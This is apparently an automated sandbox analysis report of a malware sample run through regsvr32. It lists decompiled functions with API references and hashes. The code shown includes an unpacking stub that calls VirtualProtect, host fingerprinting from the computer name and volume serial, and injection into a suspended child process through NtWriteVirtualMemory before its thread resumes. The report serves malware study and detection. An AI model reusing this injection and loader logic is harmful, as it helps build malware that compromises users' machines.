						if( *(_t423 + 0x4356c1) == 0) {
							_t358 =  *((intOrPtr*)(_t423 + 0x4410a4))(1);
							_v12 = _t531;
							 *(_t423 + 0x4356c1) = _t358;
							_t531 = _v12;
						}
						_t296 =  &_v8;
						 *_t296 = _v8 - 1;
					} while ( *_t296 != 0);
					if( *(_t423 + 0x435018) == 0) {
						_t358 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x43549a)), 9);
						_push(0);
						 *_t572 = _t489;
						 *(_t423 + 0x435018) = 0 ^ _t358;
					}
					_t500 =  *_t572;
					_t574 = _t572 - 0xfffffffc;
					_v12 = _t454;
					_t457 = _v12;
					_t361 = (_t358 & 0x00000000 ^ _t454 ^ _v12 ^  *(_t500 + 0x28)) +  *(_t423 + 0x4350b0);
					if( *(_t423 + 0x435376) == 0) {
						_t308 = _t423 + 0x435524; // 0x435524
						_t368 =  *((intOrPtr*)(_t423 + 0x44106c))(_t361);
						_v12 = _t531;
						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) & 0x00000000;
						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) | _t531 ^ _v12 | _t368;
						_t531 = _v12;
						 *_t317 = _t308;
						_t361 = _t368 & 0x00000000 ^ _v12;
					}
					_v12 = _t500;
					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) & 0x00000000;
					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) | _t500 ^ _v12 ^ _t361;
					_t503 = _v12;
					_t535 = _t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0));
					_t364 = _t361;
					if((_t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0))) > 0) {
						if( *(_t423 + 0x43536e) == 0) {
							_t366 =  *((intOrPtr*)(_t423 + 0x441070))(0);
							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) & 0x00000000;
							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) | _t457 ^  *_t574 | _t366;
							_t457 = _t457;
						}
						_t365 = E00192C41(_t423, _t428, _t457, _t503, _t535, _t535); // executed
						_t364 = E001934DA(_t365, _t423, _t428, _t457, _t503, _t535, _t535);
					}
					_pop( *_t333);
					_pop( *_t335);
					return _t364;
				} else {
					if( *(_t423 + 0x435004) == 0) {
						_t380 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x4352fb)),  *((intOrPtr*)(_t423 + 0x4354e6)), _t454, _t428);
						_v12 = _t454;
						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) & 0x00000000;
						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) ^ _t454 & 0x00000000 ^ _t380;
						_pop( *_t225);
						_t454 = _v12;
						_pop( *_t227);
						_t428 = _v12 + (_t428 & 0x00000000);
					}
					do {
						asm("movsb");
						_t428 = _t428 - 1;
					} while (_t428 != 0);
					if( *(_t423 + 0x4359f5) == 0) {
						_t230 = _t423 + 0x4356a1; // 0x4356a1
						_t379 =  *((intOrPtr*)(_t423 + 0x441068))(_t230, _t454);
						_v12 = _t531;
						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) & 0x00000000;
						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) ^ _t531 - _v12 ^ _t379;
						_t531 = _v12;
						_t454 = _t454 & 0x00000000 |  *_t572;
						_t572 = _t572 - 0xfffffffc;
					}
					_t486 = _t486 & 0x00000000 ^ (_t428 -  *_t572 |  *(_t423 + 0x4350b0));
					_t428 = _t428;
					 *((intOrPtr*)(_t423 + 0x4354d2)) = 0x40;
					_t241 = _t423 + 0x4356e5; // 0x4356e5
					_t242 = _t423 + 0x4352b4; // 0x4352b4
					_t374 =  *((intOrPtr*)(_t423 + 0x441044))(_t242, _t241, _t454);
					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) & 0x00000000;
					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) | _t531 ^  *_t572 ^ _t374;
					_t531 = _t531;
					_t454 =  *_t572;
					_t572 = _t572 - 0xfffffffc;
					_t248 = _t423 + 0x4354d2; // 0x4354d2
					_push(2);
					_push(_t454);
					if( *(_t423 + 0x435010) == 0) {
						_t377 =  *((intOrPtr*)(_t423 + 0x441058))();
						_v12 = _t531;
						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) & 0x00000000;
						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) ^ _t531 & 0x00000000 ^ _t377;
						_t531 = _v12;
					}
					VirtualProtect(_t486, ??, ??, ??);
					goto L50;
				}
			}

0x0019242a
0x0019242a
0x0019242a
0x0019242a
0x0019242a
0x00192437
0x00192439
0x0019243a
0x00192441
0x00192442
0x00192448
0x00192450
0x00192457
0x00192466
0x00192469
0x00192472
0x00192475
0x00192475
0x0019247f
0x00192485
0x00192486
0x0019248e
0x00192498
0x0019249e
0x001924a6
0x001924ad
0x001924b3
0x001924b3
0x001924bd
0x001924ca
0x001924cd
0x001924d9
0x001924e0
0x001924e6
0x001924e9
0x001924ec
0x001924ec
0x001924f5
0x001924fc
0x00192502
0x0019250a
0x00192518
0x0019251e
0x00192524
0x0019252b
0x00192531
0x00192532
0x00192535
0x0019253a
0x0019253d
0x00192547
0x00192552
0x00192558
0x00192560
0x00192567
0x0019256d
0x00192572
0x00192575
0x0019257a
0x0019257d
0x0019257d
0x00192547
0x00192580
0x00192581
0x0019258c
0x0019258e
0x00192596
0x00192599
0x0019259f
0x001925a7
0x001925ae
0x001925b4
0x001925b9
0x001925bc
0x001925bc
0x001925c6
0x001925d7
0x001925e3
0x001925ea
0x001925f0
0x001925f1
0x001925fd
0x00192604
0x0019260a
0x00192612
0x0019261b
0x00192627
0x0019262e
0x00192634
0x00192634
0x00192637
0x0019263a
0x0019263a
0x00192656
0x00192659
0x0019265c
0x00192667
0x0019266a
0x0019266b
0x00192678
0x00192687
0x0019268d
0x00192695
0x0019269c
0x001926a2
0x001926ab
0x001926ae
0x001926ae
0x001926b1
0x001926b2
0x001926bf
0x001926c2
0x001926c8
0x001926d0
0x001926d7
0x001926dd
0x001926e2
0x001926e5
0x001926e5
0x001926e9
0x001926ef
0x001926f7
0x001926fe
0x00192704
0x00192709
0x0019270c
0x00192716
0x00192720
0x0019272c
0x00192733
0x00192739
0x0019273a
0x0019273d
0x0019273d
0x00192740
0x00192741
0x0019274c
0x00192751
0x0019275c
0x00192765
0x0019276d
0x00192774
0x0019277a
0x0019277d
0x00192780
0x00192780
0x0019278a
0x00192797
0x0019279a
0x001927a6
0x001927ad
0x001927b3
0x001927ba
0x001927bd
0x001927bd
0x001927c0
0x001927c7
0x001927cf
0x001927d8
0x001927de
0x001927e6
0x001927ed
0x001927f3
0x001927f3
0x001927f6
0x00192803
0x00192806
0x00192812
0x00192819
0x0019281f
0x00192826
0x00192829
0x00192829
0x0019282d
0x00192830
0x00192833
0x00192840
0x00192850
0x00192853
0x00192856
0x00192856
0x0019285e
0x00192861
0x00192861
0x00192864
0x0019286c
0x00192870
0x00192873
0x0019287d
0x00192887
0x0019288f
0x00192896
0x0019289c
0x0019289c
0x0019289d
0x001928a5
0x001928a7
0x001928b3
0x001928ba
0x001928c0
0x001928c0
0x001928c3
0x001928cb
0x001928cd
0x001928ce
0x001928dd
0x001928e9
0x001928ec
0x001928f3
0x001928f9
0x00192901
0x00192908
0x0019290e
0x00192913
0x00192916
0x00192916
0x00192923
0x00192925
0x0019292f
0x00192931
0x00192934
0x00192a43
0x00192a49
0x00192a56
0x00192a58
0x00192a5e
0x00192a66
0x00192a6d
0x00192a73
0x00192a73
0x00192a7f
0x00192a81
0x00192a82
0x00192a8f
0x00192a90
0x00192a9c
0x00192a9e
0x00192aa2
0x00192aa9
0x00192ab0
0x00192abc
0x00192ac3
0x00192ac9
0x00192ad6
0x00192ae2
0x00192ae2
0x00192ae2
0x00192aeb
0x00192aed
0x00192af4
0x00192afa
0x00192b01
0x00192b07
0x00192b07
0x00192b10
0x00192b1f
0x00192b21
0x00192b29
0x00192b2d
0x00192b33
0x00192b3a
0x00192b40
0x00192b40
0x00192b43
0x00192b43
0x00192b43
0x00192b53
0x00192b5d
0x00192b63
0x00192b65
0x00192b6c
0x00192b72
0x00192b75
0x00192b78
0x00192b7b
0x00192b89
0x00192b8c
0x00192b99
0x00192b9c
0x00192ba3
0x00192ba9
0x00192bb1
0x00192bb8
0x00192bbe
0x00192bc7
0x00192bca
0x00192bca
0x00192bcd
0x00192bd5
0x00192bdc
0x00192be2
0x00192bf2
0x00192bf4
0x00192bf8
0x00192c01
0x00192c05
0x00192c11
0x00192c18
0x00192c1e
0x00192c1e
0x00192c20
0x00192c26
0x00192c26
0x00192c2b
0x00192c37
0x00192c3e
0x0019293a
0x00192941
0x00192951
0x00192957
0x0019295f
0x00192966
0x0019296f
0x00192972
0x0019297b
0x0019297e
0x0019297e
0x00192981
0x00192981
0x00192982
0x00192982
0x0019298c
0x0019298f
0x00192996
0x0019299c
0x001929a4
0x001929ab
0x001929b1
0x001929ba
0x001929bd
0x001929bd
0x001929cd
0x001929cf
0x001929d0
0x001929db
0x001929e2
0x001929e9
0x001929f5
0x001929fc
0x00192a02
0x00192a05
0x00192a08
0x00192a0b
0x00192a12
0x00192a14
0x00192a1c
0x00192a1e
0x00192a24
0x00192a2c
0x00192a33
0x00192a39
0x00192a39
0x00192a3d
0x00000000
0x00192a3d

APIs

VirtualProtect.KERNEL32(00000000,00000000,00000002,004354D2), ref: 00192A3D

Memory Dump Source

Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
Instruction ID: bef05dcaa0c8a68afca46fac80285af7e9fa93abc53a52cf3e4e9080499825a5
Opcode Fuzzy Hash: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
Instruction Fuzzy Hash: 19425B72810604EFFF04DFA4C98979A7BB5FF54325F0851AADC0DAE049C77856A4CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 1000B7A8, Relevance: 9.1, APIs: 6, Instructions: 83
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E1000B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E100095E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E100085D5( &_v16);
				_t33 = E1000C392(_t43);
				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
			}

0x1000b7a8
0x1000b7b1
0x1000b7bd
0x1000b7c3
0x1000b7c5
0x1000b7cd
0x1000b7e0
0x1000b7ef
0x1000b7fa
0x1000b807
0x1000b821
0x1000b826
0x1000b828
0x1000b82f
0x1000b83f
0x1000b850
0x1000b85a
0x1000b862
0x1000b869
0x1000b86c
0x1000b889

APIs

memset.MSVCRT ref: 1000B7C5
GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821

Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D

lstrcatW.KERNEL32 ref: 1000B85A
CharUpperBuffW.USER32(?,00000000), ref: 1000B86C

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 3410906232-0
Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000CA25, Relevance: 4.6, APIs: 3, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E1000CA25(intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t57;
				long _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t68;
				signed int _t82;
				void* _t85;
				char _t86;

				_v8 = _v8 & 0x00000000;
				_v20 = __edx;
				_t65 = 0;
				_t37 = E1000C8FD( &_v8);
				_t86 = _t37;
				_v24 = _t86;
				_t87 = _t86;
				if(_t86 == 0) {
					return _t37;
				}
				_t38 =  *0x1001e688; // 0x2de0590
				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
				_t82 = _v8;
				_t68 = 0;
				_v16 = 0;
				if(_t82 == 0) {
					L20:
					E1000861A( &_v24, 0);
					return _t65;
				}
				while(_t65 == 0) {
					while(_t65 == 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
						_t92 = _t45;
						if(_t45 >= 0) {
							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
							if(_t54 != 0) {
								_t57 =  *0x1001e684; // 0x2e5faa0
								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
								if(_t85 != 0) {
									GetLastError();
									_t61 = ResumeThread(_v36);
									_t62 =  *0x1001e684; // 0x2e5faa0
									if(_t61 != 0) {
										_push(0xea60);
										_push(_t85);
										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
											_t65 = _t65 + 1;
										}
										_t62 =  *0x1001e684; // 0x2e5faa0
									}
									CloseHandle(_t85);
								}
							}
						}
						if(_v40 != 0) {
							if(_t65 == 0) {
								_t52 =  *0x1001e684; // 0x2e5faa0
								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
							}
							_t48 =  *0x1001e684; // 0x2e5faa0
							 *((intOrPtr*)(_t48 + 0x30))(_v36);
							_t50 =  *0x1001e684; // 0x2e5faa0
							 *((intOrPtr*)(_t50 + 0x30))(_v40);
						}
						_t68 = _v16;
						_t47 = _v12 + 1;
						_v12 = _t47;
						if(_t47 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t82 = _v8;
					_t68 = _t68 + 1;
					_v16 = _t68;
					if(_t68 < _t82) {
						continue;
					} else {
						break;
					}
					do {
						goto L19;
					} while (_t82 != 0);
					goto L20;
				}
				L19:
				E1000861A(_t86, 0xfffffffe);
				_t86 = _t86 + 4;
				_t82 = _t82 - 1;
			}

0x1000ca2b
0x1000ca34
0x1000ca37
0x1000ca39
0x1000ca3e
0x1000ca40
0x1000ca43
0x1000ca45
0x1000cb76
0x1000cb76
0x1000ca4b
0x1000ca5d
0x1000ca62
0x1000ca65
0x1000ca67
0x1000ca6c
0x1000cb63
0x1000cb69
0x00000000
0x1000cb72
0x1000ca72
0x1000ca7d
0x1000ca8a
0x1000ca8e
0x1000ca8f
0x1000ca90
0x1000ca94
0x1000ca99
0x1000ca9b
0x1000caa8
0x1000cab0
0x1000cabb
0x1000cac6
0x1000caca
0x1000cacc
0x1000cada
0x1000cae2
0x1000cae7
0x1000cae9
0x1000caee
0x1000caf4
0x1000caf6
0x1000caf6
0x1000caf7
0x1000caf7
0x1000cafd
0x1000cafd
0x1000caca
0x1000cab0
0x1000cb04
0x1000cb08
0x1000cb0a
0x1000cb13
0x1000cb13
0x1000cb19
0x1000cb21
0x1000cb24
0x1000cb2c
0x1000cb2c
0x1000cb32
0x1000cb35
0x1000cb36
0x1000cb3c
0x00000000
0x00000000
0x00000000
0x00000000
0x1000cb3c
0x1000cb42
0x1000cb45
0x1000cb46
0x1000cb4b
0x00000000
0x00000000
0x00000000
0x00000000
0x1000cb51
0x00000000
0x00000000
0x00000000
0x1000cb51
0x1000cb51
0x1000cb54
0x1000cb5a
0x1000cb5e

APIs

Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5

Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73

GetLastError.KERNEL32(?,00000001), ref: 1000CACC
ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
String ID:
API String ID: 1274669455-0
Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000B998, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E10008604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E1000861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x1000b99b
0x1000b99c
0x1000b9a3
0x1000b9ab
0x1000b9af
0x1000b9b8
0x1000b9fe
0x1000b9fe
0x1000b9c5
0x1000b9cd
0x1000b9cf
0x1000b9d5
0x1000b9ee
0x00000000
0x1000b9f0
0x1000b9f5
0x00000000
0x1000b9fb
0x1000b9d7
0x1000b9d7
0x1000b9d7
0x1000b9d7
0x1000b9d5
0x1000ba04

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocErrorHeapLast
String ID:
API String ID: 4258577378-0
Opcode ID: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
Opcode Fuzzy Hash: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE66, Relevance: 3.0, APIs: 2, Instructions: 46
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				WCHAR* _t15;
				int _t19;
				struct _PROCESS_INFORMATION* _t20;

				_t20 = __edx;
				_t15 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 = 0x44;
				memset( &_v72, 0, _t19);
				_v72.cb = _t19;
				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}

0x1000ae6f
0x1000ae75
0x1000ae79
0x1000ae7a
0x1000ae7b
0x1000ae7c
0x1000ae80
0x1000ae85
0x1000ae8d
0x1000aea5
0x1000aeab
0x1000aeb3

APIs

memset.MSVCRT ref: 1000AE85
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcessmemset
String ID:
API String ID: 2296119082-0
Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161

Uniqueness

Uniqueness Score: -1.00%

Function 1000E1BC, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E100095C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E1000E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E100085C2( &_v8);
				return _t25;
			}

0x1000e1bf
0x1000e1c2
0x1000e1c8
0x1000e1ca
0x1000e1cf
0x1000e1d1
0x1000e1db
0x1000e1dc
0x1000e1eb
0x1000e1de
0x1000e1de
0x1000e1de
0x1000e1ef
0x1000e1f6
0x1000e1fc
0x1000e1fc
0x1000e201
0x1000e20c

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1DE
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1EB

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
Instruction ID: 73ed2ebf8e11191eb6597406948a09e9f6d4d80ef2ff5e7d934a0b04cc0c2bea
Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
Instruction Fuzzy Hash: 92F08231704254ABE704DB69DC8589EB7EDEB547D1710402AF406E3255DA70DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCC0, Relevance: 2.5, APIs: 2, Instructions: 48
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
				CHAR* _v8;
				int _t28;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				void* _t38;
				signed int* _t41;

				_t41 = _a8;
				_t31 = 0;
				if(_t41[1] > 0) {
					_t38 = 0;
					do {
						_t3 =  &(_t41[2]); // 0xe6840d8b
						_t34 =  *_t3;
						_t35 = 0;
						_a8 = 0;
						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
							_v8 = _a4 + 0x24;
							while(1) {
								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
								_t14 =  &(_t41[2]); // 0xe6840d8b
								_t34 =  *_t14;
								if(_t28 == 0) {
									break;
								}
								_t35 = _a8 + 1;
								_a8 = _t35;
								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t41 =  *_t41 |  *(_t34 + _t38);
						}
						L8:
						_t31 = _t31 + 1;
						_t38 = _t38 + 0x10;
						_t20 =  &(_t41[1]); // 0x1374ff85
					} while (_t31 <  *_t20);
				}
				Sleep(0xa);
				return 1;
			}

0x1000ccc6
0x1000ccc9
0x1000ccce
0x1000ccd1
0x1000ccd3
0x1000ccd3
0x1000ccd3
0x1000ccd6
0x1000ccd8
0x1000ccdf
0x1000cce7
0x1000ccea
0x1000ccf4
0x1000ccfa
0x1000ccfa
0x1000ccff
0x00000000
0x00000000
0x1000cd04
0x1000cd05
0x1000cd0c
0x00000000
0x00000000
0x1000cd0e
0x00000000
0x1000cd0c
0x1000cd13
0x1000cd13
0x1000cd15
0x1000cd15
0x1000cd16
0x1000cd19
0x1000cd19
0x1000cd1e
0x1000cd26
0x1000cd32

APIs

lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: Sleeplstrcmpi
String ID:
API String ID: 1261054337-0
Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10005E96, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005E96() {
				intOrPtr _t3;

				_t3 =  *0x1001e684; // 0x2e5faa0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
				ExitProcess(0);
			}

0x10005e96
0x10005ea3
0x10005ead

APIs

